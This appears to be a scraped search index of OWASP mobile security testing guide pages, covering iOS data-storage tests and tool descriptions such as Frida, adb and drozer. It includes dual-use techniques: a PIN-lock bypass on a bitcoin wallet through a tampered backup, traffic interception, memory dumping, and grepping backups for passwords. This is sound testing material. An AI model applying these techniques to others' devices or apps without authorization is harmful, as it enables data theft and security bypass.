"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0054/","title":"Determining Whether Sensitive Data Is Shared with Third Parties","text":""},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0054/#overview","title":"Overview","text":"Sensitive information might be leaked to third parties by several means. On iOS typically via third-party services embedded in the app.
The features these services provide can involve tracking services to monitor the user's behavior while using the app, selling banner advertisements, or improving the user experience.
The downside is that developers don't usually know the details of the code executed via third-party libraries. Consequently, no more information than is necessary should be sent to a service, and no sensitive information should be disclosed.
Most third-party services are implemented in two ways:
To determine whether API calls and functions provided by the third-party library are used according to best practices, review their source code, requested permissions and check for any known vulnerabilities.
All data that's sent to third-party services should be anonymized to prevent exposure of PII (Personal Identifiable Information) that would allow the third party to identify the user account. No other data (such as IDs that can be mapped to a user account or session) should be sent to a third party.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0054/#dynamic-analysis","title":"Dynamic Analysis","text":"Check all requests to external services for embedded sensitive information. To intercept traffic between the client and server, you can perform dynamic analysis by launching a man-in-the-middle (MITM) attack with Burp Suite Professional or OWASP ZAP. Once you route the traffic through the interception proxy, you can try to sniff the traffic that passes between the app and server. All app requests that aren't sent directly to the server on which the main function is hosted should be checked for sensitive information, such as PII in a tracker or ad service.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0055/","title":"Finding Sensitive Data in the Keyboard Cache","text":""},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0055/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0055/#static-analysis","title":"Static Analysis","text":" textObject.autocorrectionType = UITextAutocorrectionTypeNo;\n textObject.secureTextEntry = YES;\n
Interface Builder
of Xcode and verify the states of Secure Text Entry
and Correction
in the Attributes Inspector
for the appropriate object.The application must prevent the caching of sensitive information entered into text fields. You can prevent caching by disabling it programmatically, using the textObject.autocorrectionType = UITextAutocorrectionTypeNo
directive in the desired UITextFields, UITextViews, and UISearchBars. For data that should be masked, such as PINs and passwords, set textObject.secureTextEntry
to YES
.
UITextField *textField = [ [ UITextField alloc ] initWithFrame: frame ];\ntextField.autocorrectionType = UITextAutocorrectionTypeNo;\n
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0055/#dynamic-analysis","title":"Dynamic Analysis","text":"If a jailbroken iPhone is available, execute the following steps:
Settings > General > Reset > Reset Keyboard Dictionary
..dat
in the following directory and its subdirectories. (which might be different for iOS versions before 8.0): /private/var/mobile/Library/Keyboard/
UITextField *textField = [ [ UITextField alloc ] initWithFrame: frame ];\ntextField.autocorrectionType = UITextAutocorrectionTypeNo;\n
If you must use a non-jailbroken iPhone:
A backup of a device on which a mobile application has been installed will include all subdirectories (except for Library/Caches/
) and files in the app's private directory.
Therefore, avoid storing sensitive data in plaintext within any of the files or folders that are in the app's private directory or subdirectories.
Although all the files in Documents/
and Library/Application Support/
are always backed up by default, you can exclude files from the backup by calling NSURL setResourceValue:forKey:error:
with the NSURLIsExcludedFromBackupKey
key.
You can use the NSURLIsExcludedFromBackupKey and CFURLIsExcludedFromBackupKey file system properties to exclude files and directories from backups. An app that needs to exclude many files can do so by creating its own subdirectory and marking that directory excluded. Apps should create their own directories for exclusion instead of excluding system-defined directories.
Both file system properties are preferable to the deprecated approach of directly setting an extended attribute. All apps running on iOS version 5.1 and later should use these properties to exclude data from backups.
The following is sample Objective-C code for excluding a file from a backup on iOS 5.1 and later:
- (BOOL)addSkipBackupAttributeToItemAtPath:(NSString *) filePathString\n{\n NSURL* URL= [NSURL fileURLWithPath: filePathString];\n assert([[NSFileManager defaultManager] fileExistsAtPath: [URL path]]);\n\n NSError *error = nil;\n BOOL success = [URL setResourceValue: [NSNumber numberWithBool: YES]\n forKey: NSURLIsExcludedFromBackupKey error: &error];\n if(!success){\n NSLog(@\"Error excluding %@ from backup %@\", [URL lastPathComponent], error);\n }\n return success;\n}\n
The following is sample Swift code for excluding a file from a backup on iOS 5.1 and later, see Swift excluding files from iCloud backup for more information:
enum ExcludeFileError: Error {\n case fileDoesNotExist\n case error(String)\n}\n\nfunc excludeFileFromBackup(filePath: URL) -> Result<Bool, ExcludeFileError> {\n var file = filePath\n\n do {\n if FileManager.default.fileExists(atPath: file.path) {\n var res = URLResourceValues()\n res.isExcludedFromBackup = true\n try file.setResourceValues(res)\n return .success(true)\n\n } else {\n return .failure(.fileDoesNotExist)\n }\n } catch {\n return .failure(.error(\"Error excluding \\(file.lastPathComponent) from backup \\(error)\"))\n }\n}\n
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0058/#dynamic-analysis","title":"Dynamic Analysis","text":"In order to test the backup, you obviously need to create one first. The most common way to create a backup of an iOS device is by using iTunes, which is available for Windows, Linux and of course macOS (till macOS Mojave). When creating a backup via iTunes you can always only backup the whole device and not select just a single app. Make sure that the option \"Encrypt local backup\" in iTunes is not set, so that the backup is stored in cleartext on your hard drive.
iTunes is no longer available from macOS Catalina onwards. Management of an iOS device, including updates, backup and restore, has been moved to the Finder app. The approach remains the same, as described above.
After the iOS device has been backed up, you need to retrieve the file path of the backup, which are different locations on each OS. The official Apple documentation will help you to locate backups of your iPhone, iPad, and iPod touch.
When you want to navigate to the backup folder up to High Sierra you can easily do so. Starting with macOS Mojave you will get the following error (even as root):
$ pwd\n/Users/foo/Library/Application Support\n$ ls -alh MobileSync\nls: MobileSync: Operation not permitted\n
This is not a permission issue of the backup folder, but a new feature in macOS Mojave. You can solve this problem by granting full disk access to your terminal application by following the explanation on OSXDaily.
Before you can access the directory you need to select the folder with the UDID of your device. Check the section \"Getting the UDID of an iOS device\" in the \"iOS Basic Security Testing\" chapter on how to retrieve the UDID.
Once you know the UDID you can navigate into this directory and you will find the full backup of the whole device, which does include pictures, app data and whatever might have been stored on the device.
Review the data that's in the backed up files and folders. The structure of the directories and file names is obfuscated and will look like this:
$ pwd\n/Users/foo/Library/Application Support/MobileSync/Backup/416f01bd160932d2bf2f95f1f142bc29b1c62dcb/00\n$ ls | head -n 3\n000127b08898088a8a169b4f63b363a3adcf389b\n0001fe89d0d03708d414b36bc6f706f567b08d66\n000200a644d7d2c56eec5b89c1921dacbec83c3e\n
Therefore, it's not straightforward to navigate through it and you will not find any hints of the app you want to analyze in the directory or file name. You can consider using the iMazing shareware utility to assist here. Perform a device backup with iMazing and use its built-in backup explorer to easily analyze app container contents including original paths and file names.
Without iMazing or similar software you may need to resort to using grep to identify sensitive data. This is not the most thorough approach but you can try searching for sensitive data that you have keyed in while using the app before you made the backup. For example: the username, password, credit card data, PII or any data that is considered sensitive in the context of the app.
~/Library/Application Support/MobileSync/Backup/<UDID>\ngrep -iRn \"password\" .\n
As described in the Static Analysis section, any sensitive data that you're able to find should be excluded from the backup, encrypted properly by using the Keychain or not stored on the device in the first place.
To identify if a backup is encrypted, you can check the key named \"IsEncrypted\" from the file \"Manifest.plist\", located at the root of the backup directory. The following example shows a configuration indicating that the backup is encrypted:
<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n...\n <key>Date</key>\n <date>2021-03-12T17:43:33Z</date>\n <key>IsEncrypted</key>\n <true/>\n...\n</plist>\n
In case you need to work with an encrypted backup, there are some Python scripts in DinoSec's GitHub repo, such as backup_tool.py and backup_passwd.py, that will serve as a good starting point. However, note that they might not work with the latest iTunes/Finder versions and might need to be tweaked.
You can also use the tool iOSbackup to easily read and extract files from a password-encrypted iOS backup.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0058/#proof-of-concept-removing-ui-lock-with-tampered-backup","title":"Proof of Concept: Removing UI Lock with Tampered Backup","text":"As discussed earlier, sensitive data is not limited to just user data and PII. It can also be configuration or settings files that affect app behavior, restrict functionality, or enable security controls. If you take a look at the open source bitcoin wallet app, Bither, you'll see that it's possible to configure a PIN to lock the UI. And after a few easy steps, you will see how to bypass this UI lock with a modified backup on a non-jailbroken device.
After you enable the pin, use iMazing to perform a device backup:
Next you can open the backup to view app container files within your target app:
At this point you can view all the backed up content for Bither.
This is where you can begin parsing through the files looking for sensitive data. In the screenshot you'll see the net.bither.plist
file which contains the pin_code
attribute. To remove the UI lock restriction, simply delete the pin_code
attribute and save the changes.
From there it's possible to easily restore the modified version of net.bither.plist
back onto the device using the licensed version of iMazing.
The free workaround, however, is to find the plist file in the obfuscated backup generated by iTunes/Finder. So create your backup of the device with Bither's PIN code configured. Then, using the steps described earlier, find the backup directory and grep for \"pin_code\" as shown below.
$ ~/Library/Application Support/MobileSync/Backup/<UDID>\n$ grep -iRn \"pin_code\" .\nBinary file ./13/135416dd5f251f9251e0f07206277586b7eac6f6 matches\n
You'll see there was a match on a binary file with an obfuscated name. This is your net.bither.plist
file. Go ahead and rename the file giving it a plist extension so Xcode can easily open it up for you.
Again, remove the pin_code
attribute from the plist and save your changes. Rename the file back to the original name (i.e., without the plist extension) and perform your backup restore. When the restore is complete you'll see that Bither no longer prompts you for the PIN code when launched.
When performing static analysis for sensitive data exposed via memory, you should
String
and NSString
,There are several approaches and tools available for dynamically testing the memory of an iOS app for sensitive data.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0060/#retrieving-and-analyzing-a-memory-dump","title":"Retrieving and Analyzing a Memory Dump","text":"Whether you are using a jailbroken or a non-jailbroken device, you can dump the app's process memory with objection and Fridump. You can find a detailed explanation of this process in the section \"Memory Dump\", in the chapter \"Tampering and Reverse Engineering on iOS\".
After the memory has been dumped (e.g. to a file called \"memory\"), depending on the nature of the data you're looking for, you'll need a set of different tools to process and analyze that memory dump. For instance, if you're focusing on strings, it might be sufficient for you to execute the command strings
or rabin2 -zz
to extract those strings.
# using strings\n$ strings memory > strings.txt\n\n# using rabin2\n$ rabin2 -ZZ memory > strings.txt\n
Open strings.txt
in your favorite editor and dig through it to identify sensitive information.
However if you'd like to inspect other kind of data, you'd rather want to use radare2 and its search capabilities. See radare2's help on the search command (/?
) for more information and a list of options. The following shows only a subset of them:
$ r2 <name_of_your_dump_file>\n\n[0x00000000]> /?\nUsage: /[!bf] [arg] Search stuff (see 'e??search' for options)\n|Use io.va for searching in non virtual addressing spaces\n| / foo\\x00 search for string 'foo\\0'\n| /c[ar] search for crypto materials\n| /e /E.F/i match regular expression\n| /i foo search for string 'foo' ignoring case\n| /m[?][ebm] magicfile search for magic, filesystems or binary headers\n| /v[1248] value look for an `cfg.bigendian` 32bit value\n| /w foo search for wide string 'f\\0o\\0o\\0'\n| /x ff0033 search for hex string\n| /z min max search for strings of given size\n...\n
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0060/#runtime-memory-analysis","title":"Runtime Memory Analysis","text":"By using r2frida you can analyze and inspect the app's memory while running and without needing to dump it. For example, you may run the previous search commands from r2frida and search the memory for a string, hexadecimal values, etc. When doing so, remember to prepend the search command (and any other r2frida specific commands) with a backslash :
after starting the session with r2 frida://usb//<name_of_your_app>
.
For more information, options and approaches, please refer to section \"In-Memory Search\" in the chapter \"Tampering and Reverse Engineering on iOS\".
"},{"location":"MASTG/tools/","title":"Testing Tools","text":"The OWASP MASTG includes many tools to assist you in executing test cases, allowing you to perform static analysis, dynamic analysis, dynamic instrumentation, etc. These tools are meant to help you conduct your own assessments, rather than provide a conclusive result on an application's security status. It's essential to carefully review the tools' output, as it can contain both false positives and false negatives.
The goal of the MASTG is to be as accessible as possible. For this reason, we prioritize including tools that meet the following criteria:
In instances where no suitable open-source alternative exists, we may include closed-source tools. However, any closed-source tools included must be free to use, as we aim to avoid featuring paid tools whenever possible. This also extends to freeware or community editions of commercial tools.
Our goal is to be vendor-neutral and to serve as a trusted learning resource, so the specific category of \"automated mobile application security scanners\" presents a unique challenge. For this reason, we have historically avoided including such tools due to the competitive disadvantages they can create among vendors. In contrast, we prioritize tools like MobSF that provide full access to their code and a comprehensive set of tests, making them excellent for educational purposes. Tools that lack this level of transparency, even if they offer a free version, generally do not meet the inclusion criteria of the OWASP MAS project.
Disclaimer: Each tool included in the MASTG examples was verified to be functional at the time it was added. However, the tools may not work properly depending on the OS version of both your host computer and your test device. The functionality of the tools can also be affected by whether you're using a rooted or jailbroken device, the specific version of the rooting or jailbreaking method, and/or the tool version itself. The OWASP MASTG does not assume any responsibility for the operational status of these tools. If you encounter a broken tool or example, we recommend searching online for a solution or contacting the tool's provider directly. If the tool has a GitHub page, you may also open an issue there.
"},{"location":"MASTG/tools/#generic-tools","title":"Generic Tools","text":"ID Name Platform MASTG-TOOL-0037 RMS Runtime Mobile Security generic MASTG-TOOL-0031 Frida generic MASTG-TOOL-0035 MobSF generic MASTG-TOOL-0032 Frida CodeShare generic MASTG-TOOL-0033 Ghidra generic MASTG-TOOL-0036 r2frida generic MASTG-TOOL-0038 objection generic MASTG-TOOL-0034 LIEF generic MASTG-TOOL-0098 iaito generic"},{"location":"MASTG/tools/#android-tools","title":"Android Tools","text":"ID Name Platform MASTG-TOOL-0023 RootCloak Plus android MASTG-TOOL-0015 Drozer android MASTG-TOOL-0003 nm - Android android MASTG-TOOL-0004 adb android MASTG-TOOL-0009 APKiD android MASTG-TOOL-0024 Scrcpy android MASTG-TOOL-0029 objection for Android android MASTG-TOOL-0006 Android SDK android MASTG-TOOL-0025 SSLUnpinning android MASTG-TOOL-0018 jadx android MASTG-TOOL-0007 Android Studio android MASTG-TOOL-0019 jdb android MASTG-TOOL-0099 FlowDroid android MASTG-TOOL-0028 radare2 for Android android MASTG-TOOL-0001 Frida for Android android MASTG-TOOL-0014 Bytecode Viewer android MASTG-TOOL-0008 Android-SSL-TrustKiller android MASTG-TOOL-0021 Magisk android MASTG-TOOL-0010 APKLab android MASTG-TOOL-0011 Apktool android MASTG-TOOL-0017 House android MASTG-TOOL-0026 Termux android MASTG-TOOL-0002 MobSF for Android android MASTG-TOOL-0030 Angr android MASTG-TOOL-0027 Xposed android MASTG-TOOL-0013 Busybox android MASTG-TOOL-0016 gplaycli android MASTG-TOOL-0022 Proguard android MASTG-TOOL-0020 JustTrustMe android MASTG-TOOL-0012 apkx android MASTG-TOOL-0005 Android NDK android"},{"location":"MASTG/tools/#ios-tools","title":"Ios Tools","text":"ID Name Platform MASTG-TOOL-0053 iOSbackup ios MASTG-TOOL-0040 MobSF for iOS ios MASTG-TOOL-0074 objection for iOS ios MASTG-TOOL-0072 xcrun ios MASTG-TOOL-0069 Usbmuxd ios MASTG-TOOL-0057 lldb ios MASTG-TOOL-0071 Xcode Command Line Tools ios MASTG-TOOL-0066 SSL Kill Switch 3 ios MASTG-TOOL-0051 gdb ios MASTG-TOOL-0050 Frida-ios-dump ios MASTG-TOOL-0060 otool 
ios MASTG-TOOL-0041 nm - iOS ios MASTG-TOOL-0046 Cycript ios MASTG-TOOL-0065 simctl ios MASTG-TOOL-0068 SwiftShield ios MASTG-TOOL-0039 Frida for iOS ios MASTG-TOOL-0044 class-dump-z ios MASTG-TOOL-0055 iProxy ios MASTG-TOOL-0048 dsdump ios MASTG-TOOL-0059 optool ios MASTG-TOOL-0056 Keychain-Dumper ios MASTG-TOOL-0042 BinaryCookieReader ios MASTG-TOOL-0047 Cydia ios MASTG-TOOL-0101 codesign ios MASTG-TOOL-0062 Plutil ios MASTG-TOOL-0073 radare2 for iOS ios MASTG-TOOL-0049 Frida-cycript ios MASTG-TOOL-0061 Grapefruit ios MASTG-TOOL-0064 Sileo ios MASTG-TOOL-0067 swift-demangle ios MASTG-TOOL-0045 class-dump-dyld ios MASTG-TOOL-0058 MachoOView ios MASTG-TOOL-0063 security ios MASTG-TOOL-0054 ios-deploy ios MASTG-TOOL-0070 Xcode ios MASTG-TOOL-0043 class-dump ios"},{"location":"MASTG/tools/#network-tools","title":"Network Tools","text":"ID Name Platform MASTG-TOOL-0075 Android tcpdump network MASTG-TOOL-0078 MITM Relay network MASTG-TOOL-0076 bettercap network MASTG-TOOL-0097 mitmproxy network MASTG-TOOL-0081 Wireshark network MASTG-TOOL-0079 OWASP ZAP network MASTG-TOOL-0080 tcpdump network MASTG-TOOL-0077 Burp Suite network"},{"location":"MASTG/tools/android/MASTG-TOOL-0001/","title":"Frida for Android","text":"Frida supports interaction with the Android Java runtime though the Java API. You'll be able to hook and call both Java and native functions inside the process and its native libraries. Your JavaScript snippets have full access to memory, e.g. to read and/or write any structured data.
Here are some tasks that Frida APIs offers and are relevant or exclusive on Android:
Remember that on Android, you can also benefit from the built-in tools provided when installing Frida, that includes the Frida CLI (frida
), frida-ps
, frida-ls-devices
and frida-trace
, to name some of them.
Frida is often compared to Xposed, however this comparison is far from fair as both frameworks were designed with different goals in mind. This is important to understand as an app security tester so that you can know which framework to use in which situation:
Note that Xposed, as of early 2019, does not work on Android 9 (API level 28) yet.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0001/#installing-frida-on-android","title":"Installing Frida on Android","text":"In order to set up Frida on your Android device:
We assume a rooted device here unless otherwise noted. Download the frida-server binary from the Frida releases page. Make sure that you download the right frida-server binary for the architecture of your Android device or emulator: x86, x86_64, arm or arm64. Make sure that the server version (at least the major version number) matches the version of your local Frida installation. PyPI usually installs the latest version of Frida. If you're unsure which version is installed, you can check with the Frida command line tool:
frida --version\n
Or you can run the following command to automatically detect Frida version and download the right frida-server binary:
wget https://github.com/frida/frida/releases/download/$(frida --version)/frida-server-$(frida --version)-android-arm.xz\n
Copy frida-server to the device and run it:
adb push frida-server /data/local/tmp/\nadb shell \"chmod 755 /data/local/tmp/frida-server\"\nadb shell \"su -c /data/local/tmp/frida-server &\"\n
"},{"location":"MASTG/tools/android/MASTG-TOOL-0001/#using-frida-on-android","title":"Using Frida on Android","text":"With frida-server running, you should now be able to get a list of running processes with the following command (use the -U
option to indicate Frida to use a connected USB devices or emulator):
$ frida-ps -U\n PID Name\n----- --------------------------------------------------------------\n 276 adbd\n 956 android.process.media\n 198 bridgemgrd\n30692 com.android.chrome\n30774 com.android.chrome:privileged_process0\n30747 com.android.chrome:sandboxed\n30834 com.android.chrome:sandboxed\n 3059 com.android.nfc\n 1526 com.android.phone\n17104 com.android.settings\n 1302 com.android.systemui\n(...)\n
Or restrict the list with the -Uai
flag combination to get all apps (-a
) currently installed (-i
) on the connected USB device (-U
):
$ frida-ps -Uai\n PID Name Identifier\n----- ---------------------------------------- ------------------------------\n 766 Android System android\n30692 Chrome com.android.chrome\n 3520 Contacts Storage com.android.providers.contacts\n - Uncrackable1 sg.vantagepoint.uncrackable1\n - drozer Agent com.mwr.dz\n
This will show the names and identifiers of all apps, if they are currently running it will also show their PIDs. Search for your app in the list and take a note of the PID or its name/identifier. From now on you'll refer to your app by using one of them. A recommendation is to use the identifiers, as the PIDs will change on each run of the app. For example let's take com.android.chrome
. You can use this string now on all Frida tools, e.g. on the Frida CLI, on frida-trace or from a Python script.
To trace specific (low-level) library calls, you can use the frida-trace
command line tool:
frida-trace -U com.android.chrome -i \"open\"\n
This generates a little JavaScript in __handlers__/libc.so/open.js
, which Frida injects into the process. The script traces all calls to the open
function in libc.so
. You can modify the generated script according to your needs with Frida JavaScript API.
Unfortunately tracing high-level methods of Java classes is not yet supported (but might be in the future).
"},{"location":"MASTG/tools/android/MASTG-TOOL-0001/#frida-cli-and-the-java-api","title":"Frida CLI and the Java API","text":"Use the Frida CLI tool (frida
) to work with Frida interactively. It hooks into a process and gives you a command line interface to Frida's API.
frida -U com.android.chrome\n
With the -l
option, you can also use the Frida CLI to load scripts , e.g., to load myscript.js
:
frida -U -l myscript.js com.android.chrome\n
Frida also provides a Java API, which is especially helpful for dealing with Android apps. It lets you work with Java classes and objects directly. Here is a script to overwrite the onResume
function of an Activity class:
Java.perform(function () {\n var Activity = Java.use(\"android.app.Activity\");\n Activity.onResume.implementation = function () {\n console.log(\"[*] onResume() got called!\");\n this.onResume();\n };\n});\n
The above script calls Java.perform
to make sure that your code gets executed in the context of the Java VM. It instantiates a wrapper for the android.app.Activity
class via Java.use
and overwrites the onResume
function. The new onResume
function implementation prints a notice to the console and calls the original onResume
method by invoking this.onResume
every time an activity is resumed in the app.
The JADX decompiler (v1.3.3 and above) can generate Frida snippets through its graphical code browser. To use this feature, open the APK or DEX with jadx-gui
, browse to the target method, right click the method name, and select \"Copy as frida snippet (f)\". For example using the MASTG UnCrackable App for Android Level 1:
The above steps place the following output in the pasteboard, which you can then paste in a JavaScript file and feed into frida -U -l
.
let a = Java.use(\"sg.vantagepoint.a.a\");\na[\"a\"].implementation = function (bArr, bArr2) {\n console.log('a is called' + ', ' + 'bArr: ' + bArr + ', ' + 'bArr2: ' + bArr2);\n let ret = this.a(bArr, bArr2);\n console.log('a ret value is ' + ret);\n return ret;\n};\n
The above code hooks the a
method within the sg.vantagepoint.a.a
class and logs its input parameters and return values.
Frida also lets you search for and work with instantiated objects that are on the heap. The following script searches for instances of android.view.View
objects and calls their toString
method. The result is printed to the console:
setImmediate(function() {\n console.log(\"[*] Starting script\");\n Java.perform(function () {\n Java.choose(\"android.view.View\", {\n \"onMatch\":function(instance){\n console.log(\"[*] Instance found: \" + instance.toString());\n },\n \"onComplete\":function() {\n console.log(\"[*] Finished heap search\")\n }\n });\n });\n});\n
The output would look like this:
[*] Starting script\n[*] Instance found: android.view.View{7ccea78 G.ED..... ......ID 0,0-0,0 #7f0c01fc app:id/action_bar_black_background}\n[*] Instance found: android.view.View{2809551 V.ED..... ........ 0,1731-0,1731 #7f0c01ff app:id/menu_anchor_stub}\n[*] Instance found: android.view.View{be471b6 G.ED..... ......I. 0,0-0,0 #7f0c01f5 app:id/location_bar_verbose_status_separator}\n[*] Instance found: android.view.View{3ae0eb7 V.ED..... ........ 0,0-1080,63 #102002f android:id/statusBarBackground}\n[*] Finished heap search\n
You can also use Java's reflection capabilities. To list the public methods of the android.view.View
class, you could create a wrapper for this class in Frida and call getMethods
from the wrapper's class
property:
Java.perform(function () {\n var view = Java.use(\"android.view.View\");\n var methods = view.class.getMethods();\n for(var i = 0; i < methods.length; i++) {\n console.log(methods[i].toString());\n }\n});\n
This will print a very long list of methods to the terminal:
public boolean android.view.View.canResolveLayoutDirection()\npublic boolean android.view.View.canResolveTextAlignment()\npublic boolean android.view.View.canResolveTextDirection()\npublic boolean android.view.View.canScrollHorizontally(int)\npublic boolean android.view.View.canScrollVertically(int)\npublic final void android.view.View.cancelDragAndDrop()\npublic void android.view.View.cancelLongPress()\npublic final void android.view.View.cancelPendingInputEvents()\n...\n
"},{"location":"MASTG/tools/android/MASTG-TOOL-0002/","title":"MobSF for Android","text":"After MobSF is done with its analysis, you will receive a one-page overview of all the tests that were executed. The page is split up into multiple sections giving some first hints on the attack surface of the application.
The following is displayed:
AndroidManifest.xml
file.Refer to MobSF documentation for more details.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0003/","title":"nm - Android","text":"nm is a tool that displays the name list (symbol table) of the given binary. You can find here more information for the Android (GNU) version.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0004/","title":"adb","text":"adb (Android Debug Bridge), shipped with the Android SDK, bridges the gap between your local development environment and a connected Android device. You'll usually leverage it to test apps on the emulator or a connected device via USB or Wi-Fi. Use the adb devices
command to list the connected devices and execute it with the -l
argument to retrieve more details on them.
$ adb devices -l\nList of devices attached\n090c285c0b97f748 device usb:1-1 product:razor model:Nexus_7 device:flo\nemulator-5554 device product:sdk_google_phone_x86 model:Android_SDK_built_for_x86 device:generic_x86 transport_id:1\n
adb provides other useful commands such as adb shell
to start an interactive shell on a target and adb forward
to forward traffic on a specific host port to a different port on a connect device.
adb forward tcp:<host port> tcp:<device port>\n
$ adb -s emulator-5554 shell\nroot@generic_x86:/ # ls\nacct\ncache\ncharger\nconfig\n...\n
You'll come across different use cases on how you can use adb commands when testing later in this book. Note that you must define the serialnummer of the target device with the -s
argument (as shown by the previous code snippet) in case you have multiple devices connected.
The Android NDK contains prebuilt versions of the native compiler and toolchain. Both the GCC and Clang compilers have traditionally been supported, but active support for GCC ended with NDK revision 14. The device architecture and host OS determine the appropriate version. The prebuilt toolchains are in the toolchains
directory of the NDK, which contains one subdirectory for each architecture.
Besides picking the right architecture, you need to specify the correct sysroot for the native API level you want to target. The sysroot is a directory that contains the system headers and libraries for your target. Native APIs vary by Android API level. Available sysroot directories for each Android API level can be found in $NDK/platforms/
. Each API level directory contains subdirectories for the various CPUs and architectures.
One possibility for setting up the build system is exporting the compiler path and necessary flags as environment variables. To make things easier, however, the NDK allows you to create a so-called standalone toolchain, which is a temporary toolchain that incorporates the required settings.
To set up a standalone toolchain, download the latest stable version of the NDK. Extract the ZIP file, change into the NDK root directory, and run the following command:
./build/tools/make_standalone_toolchain.py --arch arm --api 24 --install-dir /tmp/android-7-toolchain\n
This creates a standalone toolchain for Android 7.0 (API level 24) in the directory /tmp/android-7-toolchain
. For convenience, you can export an environment variable that points to your toolchain directory, (we'll be using this in the examples). Run the following command or add it to your .bash_profile
or other startup script:
export TOOLCHAIN=/tmp/android-7-toolchain\n
"},{"location":"MASTG/tools/android/MASTG-TOOL-0006/","title":"Android SDK","text":"Local Android SDK installations are managed via Android Studio. Create an empty project in Android Studio and select Tools -> SDK Manager to open the SDK Manager GUI. The SDK Platforms tab is where you install SDKs for multiple API levels. Recent API levels are:
An overview of all Android codenames, their version number and API levels can be found in the Android Developer Documentation.
Installed SDKs are on the following paths:
Windows:
C:\\Users\\<username>\\AppData\\Local\\Android\\sdk\n
MacOS:
/Users/<username>/Library/Android/sdk\n
Note: On Linux, you need to choose an SDK directory. /opt
, /srv
, and /usr/local
are common choices.
The official IDE for Google's Android operating system, built on JetBrains' IntelliJ IDEA software and designed specifically for Android development - https://developer.android.com/studio/index.html
"},{"location":"MASTG/tools/android/MASTG-TOOL-0008/","title":"Android-SSL-TrustKiller","text":"Android-SSL-TrustKiller is a Cydia Substrate Module acting as a blackbox tool to bypass SSL certificate pinning for most applications running on a device - https://github.com/iSECPartners/Android-SSL-TrustKiller
"},{"location":"MASTG/tools/android/MASTG-TOOL-0009/","title":"APKiD","text":"APKiD gives you information about how an APK was made. It identifies many compilers, packers, obfuscators, and other weird stuff.
For more information on what this tool can be used for, check out:
APKLab is a convenient Visual Studio Code extension leveraging tools such as apktool and jadx to enable features including app unpacking, decompilation, code patching (e.g. for MITM), and repackaging straight from the IDE.
For more information, you can refer to APKLab's official documentation.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0011/","title":"Apktool","text":"Apktool is used to unpack Android app packages (APKs). Simply unzipping APKs with the standard unzip
utility leaves some files unreadable. AndroidManifest.xml
is encoded into binary XML format which isn\u2019t readable with a text editor. Also, the app resources are still packaged into a single archive file.
When run with default command line flags, apktool automatically decodes the Android Manifest file to text-based XML format and extracts the file resources (it also disassembles the .DEX files to smali code - a feature that we\u2019ll revisit later in this book).
Among the unpacked files you can usually find (after running apktool d base.apk
):
You can also use apktool to repackage decoded resources back to binary APK/JAR. See the section \"Exploring the App Package\" later on this chapter and section \"Repackaging\" in the chapter Tampering and Reverse Engineering on Android for more information and practical examples.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0012/","title":"apkx","text":"apkx is a Python wrapper to popular free DEX converters and Java decompilers. It automates the extraction, conversion, and decompilation of APKs. Install it as follows:
git clone https://github.com/muellerberndt/apkx\ncd apkx\nsudo ./install.sh\n
This should copy apkx to /usr/local/bin
. See section \"Decompiling Java Code\" of the \"Reverse Engineering and Tampering\" chapter for more information about usage.
Busybox combines multiple common Unix utilities into a small single executable. The utilities included generally have fewer options than their full-featured GNU counterparts, but are sufficient to provide a complete environment on a small or embedded system. Busybox can be installed on a rooted device by downloading the Busybox application from Google Play Store. You can also download the binary directly from the Busybox website. Once downloaded, make an adb push busybox /data/local/tmp
to have the executable available on your phone. A quick overview of how to install and use Busybox can be found in the Busybox FAQ.
Bytecode Viewer (BCV) is a free and open source Java decompiler framework running on all operating systems. It is a versatile tool which can be used to decompile Android apps, view APK resources (via apktool) and easily edit APKs (via Smali/Baksmali). Apart from APKs, also DEX, Java Class files and Java Jars can be viewed. One of its major features is the support for multiple Java bytecode decompilers under one GUI. BCV currently includes the Procyon, CFR, Fernflower, Krakatau, and JADX-Core decompilers. These decompilers have different strengths and can be easily leveraged while using BCV, especially when dealing with obfuscated programs.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0015/","title":"Drozer","text":"Drozer is an Android security assessment framework that allows you to search for security vulnerabilities in apps and devices by assuming the role of a third-party app interacting with the other application's IPC endpoints and the underlying OS.
The advantage of using drozer lies in its ability to automate several tasks and the fact that it can be expanded through modules. The modules are very helpful and they cover different categories including a scanner category that allows you to scan for known defects with a simple command such as the module scanner.provider.injection
which detects SQL injections in content providers in all the apps installed in the system. Without drozer, simple tasks such as listing the app's permissions require several steps that include decompiling the APK and manually analyzing the results.
You can refer to drozer GitHub page (for Linux and Windows, for macOS please refer to this blog post) and the drozer website for prerequisites and installation instructions.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0015/#using-drozer","title":"Using Drozer","text":"Before you can start using drozer, you'll also need the drozer agent that runs on the Android device itself. Download the latest drozer agent from the GitHub releases page and install it with adb install drozer.apk
.
Once the setup is completed you can start a session to an emulator or a device connected via USB by running adb forward tcp:31415 tcp:31415
and drozer console connect
. This is called direct mode and you can see the full instructions in the User Guide in section \"Starting a Session\". An alternative is to run Drozer in infrastructure mode, where you run a drozer server that can handle multiple consoles and agents, and routes sessions between them. You can find the details of how to set up drozer in this mode in the \"Infrastructure Mode\" section of the User Guide.
Now you are ready to begin analyzing apps. A good first step is to enumerate the attack surface of an app which can be done easily with the following command:
dz> run app.package.attacksurface <package>\n
